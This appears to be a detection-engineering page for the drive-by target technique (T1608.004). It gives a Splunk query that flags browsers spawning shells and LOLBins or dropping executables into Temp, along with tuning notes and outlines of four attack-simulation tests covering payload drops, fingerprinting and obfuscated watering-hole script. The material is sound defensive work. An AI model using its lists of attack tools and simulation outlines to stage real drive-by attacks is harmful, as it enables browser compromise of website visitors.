Detect Drive-by Target in Splunk
Adversaries prepare operational websites to infect systems that visit over the normal course of browsing. This involves staging malicious JavaScript, exploit kit landing pages, browser profiling code (e.g., ScanBox), or trojanized downloads on adversary-controlled or compromised legitimate websites — including watering hole attacks targeting specific communities such as government agencies, industries, or regional groups. Staging methods include injecting malicious scripts into existing web pages, modifying files served from publicly writable cloud storage buckets, and purchasing malvertising space. Because staging occurs entirely on adversary infrastructure, direct detection is not possible from the victim side. Detection strategy focuses on victim-side downstream artifacts: browsers spawning unexpected child processes (exploitation indicator), executable files dropped by browser processes to temp directories, and browser network connections to newly registered or cloud-hosted infrastructure serving executable content.
MITRE ATT&CK
- Tactic
- Resource Development
- Technique
- T1608 Stage Capabilities
- Sub-technique
- T1608.004 Drive-by Target
- Canonical reference
- https://attack.mitre.org/techniques/T1608/004/
SPL Detection Query
(index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(ParentImage="*\\chrome.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\msedge.exe"
OR ParentImage="*\\iexplore.exe" OR ParentImage="*\\brave.exe" OR ParentImage="*\\opera.exe"
OR ParentImage="*\\microsoftedge.exe")
(Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe"
OR Image="*\\cscript.exe" OR Image="*\\mshta.exe" OR Image="*\\rundll32.exe"
OR Image="*\\regsvr32.exe" OR Image="*\\schtasks.exe" OR Image="*\\certutil.exe"
OR Image="*\\bitsadmin.exe" OR Image="*\\msiexec.exe" OR Image="*\\wmic.exe"
OR Image="*\\msbuild.exe" OR Image="*\\pcalua.exe"))
OR
(index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
(Image="*\\chrome.exe" OR Image="*\\firefox.exe" OR Image="*\\msedge.exe"
OR Image="*\\iexplore.exe" OR Image="*\\brave.exe" OR Image="*\\opera.exe")
(TargetFilename="*\\Temp\\*.exe" OR TargetFilename="*\\Temp\\*.dll"
OR TargetFilename="*\\Temp\\*.hta" OR TargetFilename="*\\Temp\\*.vbs"
OR TargetFilename="*\\Temp\\*.ps1" OR TargetFilename="*\\Temp\\*.js"
OR TargetFilename="*\\Temp\\*.bat" OR TargetFilename="*\\Temp\\*.scr"
OR TargetFilename="*\\Users\\Public\\*.exe" OR TargetFilename="*\\Users\\Public\\*.dll"))
| eval DetectionType=case(
EventCode==1, "BrowserSpawnedProcess",
EventCode==11, "BrowserDroppedFile",
"Unknown")
| eval RiskScore=case(
EventCode==1 AND match(Image, "(?i)(powershell\.exe|mshta\.exe|wscript\.exe|cscript\.exe|msbuild\.exe)"), 3,
EventCode==1 AND match(Image, "(?i)(rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|pcalua\.exe)"), 2,
EventCode==1, 1,
EventCode==11 AND match(TargetFilename, "(?i)\.(exe|dll|hta|vbs|ps1)$"), 3,
EventCode==11 AND match(TargetFilename, "(?i)\.(js|bat|cmd|scr)$"), 2,
1)
| eval ChildOrFile=coalesce(Image, TargetFilename)
| eval BrowserParent=coalesce(ParentImage, Image)
| table _time, host, User, DetectionType, ChildOrFile, CommandLine, ParentImage, ParentCommandLine, TargetFilename, RiskScore
| sort - RiskScore _timeDetects drive-by exploitation victim-side indicators using Sysmon events in Splunk. EventCode=1 (Process Create) identifies browsers spawning suspicious child processes including shells, script interpreters, and LOLBins — the primary indicator of successful browser exploitation. EventCode=11 (File Create) identifies browsers dropping executable file types to temp or public directories consistent with drive-by payload staging. Risk scoring (1-3) prioritizes high-risk child process types and executable file extensions to help analysts triage most critical alerts first.
Data Sources
Required Sourcetypes
False Positives & Tuning
- Browser extensions or plugins spawning helper processes for legitimate functionality such as PDF viewers, media players, or accessibility tools
- Legitimate browser update pipelines invoking msiexec.exe or cmd.exe to apply browser or extension updates
- Developer tool integrations where browser extensions launch local build scripts, Node.js processes, or test runners
- Enterprise custom protocol handlers (registered URI schemes) that invoke local desktop applications or batch scripts from browser clicks
- Download managers integrated with browsers writing executable installers to the Downloads or Temp directory before user-triggered installation
Other platforms for T1608.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Browser-Spawned Command Shell (Drive-by Exploitation Process Artifact)
Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, CommandLine containing 'driveby-spawn-test'. ParentImage=powershell.exe in this test (in a real attack, ParentImage would be chrome.exe or msedge.exe). Sysmon Event ID 11: File Create for driveby-spawn-test.txt in %TEMP%. Security Event ID 4688 (if command line auditing enabled) showing cmd.exe process creation with full command line.
- Test 2Browser Executable File Drop to Temp Directory (Drive-by Payload Staging)
Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\driveby-payload-test.exe, initiating process=powershell.exe (would be chrome.exe/msedge.exe in a real attack). File has MZ magic bytes confirming PE format. SHA256 hash of the 8-byte file will be logged by Defender.
- Test 3Drive-by Browser Fingerprinting Page Simulation (ScanBox-Style Reconnaissance)
Expected signal: Sysmon Event ID 1: Process Create for msedge.exe with --headless flag and file:// URI pointing to staged HTML. Sysmon Event ID 11: File Create for scanbox-sim.html in %TEMP% by PowerShell. Sysmon Event ID 3: Network Connection attempt from msedge.exe to 127.0.0.1:19876 (connection will fail — no listener — but the event fires). Browser console output (captured via --dump-dom) shows the fingerprinting script execution.
- Test 4Watering Hole Injection Simulation — Malicious Script Tag in Web Page
Expected signal: Sysmon Event ID 11: File Create for watering-hole-sim.html in %TEMP% by PowerShell. The file contains hex-encoded JavaScript obfuscation patterns (\x64\x6f\x63...) and Base64-encoded lure text matching SocGholish-style fake browser update prompts. SHA256 of the file can be submitted to threat intel platforms. In a real attack, this content would be injected into a legitimate website's HTML and served to visitors.
References (8)
- https://attack.mitre.org/techniques/T1608/004/
- https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
- http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
- https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1608.004/T1608.004.md
Unlock Pro Content
Get the full detection package for T1608.004 including response playbook, investigation guide, and atomic red team tests.